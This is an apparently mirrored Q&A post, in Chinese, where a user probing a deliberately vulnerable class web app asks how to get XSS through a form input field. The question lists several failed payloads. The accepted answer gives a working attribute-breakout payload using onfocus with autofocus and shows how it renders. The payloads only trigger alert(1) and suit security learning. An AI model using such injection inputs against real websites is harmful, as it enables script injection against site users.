我已经尝试过,但没有成功:-6ren">
gpt4 book ai didi

javascript - 如何在 HTML 输入字段中启动 XSS 代码?

转载 作者:行者123 更新时间:2023-12-03 01:08:45 25 4
gpt4 key购买 nike

我正在尝试在一个虚假的类网站上查找漏洞,我想知道如何将 XSS 代码启动到这个输入字段中?

  • 这是网站上的代码:
<form name="friendForm" method="POST" action="/Tunestore/addfriend.do">
Friend name: <input type="text" name="friend" value="&quot
<script>alert(1)</script>"><br>
<input type="submit" value="Submit">
</form>
  • 我已经尝试过,但没有成功:

    "> <script>alert(1)</script>

    " onfocus="alert(1)"

    " onclick="alert(1)

最佳答案

试试这个:

" onfocus="alert(1)" autofocus="

它将扩展为:

<'input type="text" name="friend" value=" " onfocus="alert(1)" autofocus=" " />

这将导致一个警告框,展示 XSS。

关于javascript - 如何在 HTML 输入字段中启动 XSS 代码?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/52280480/

25 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com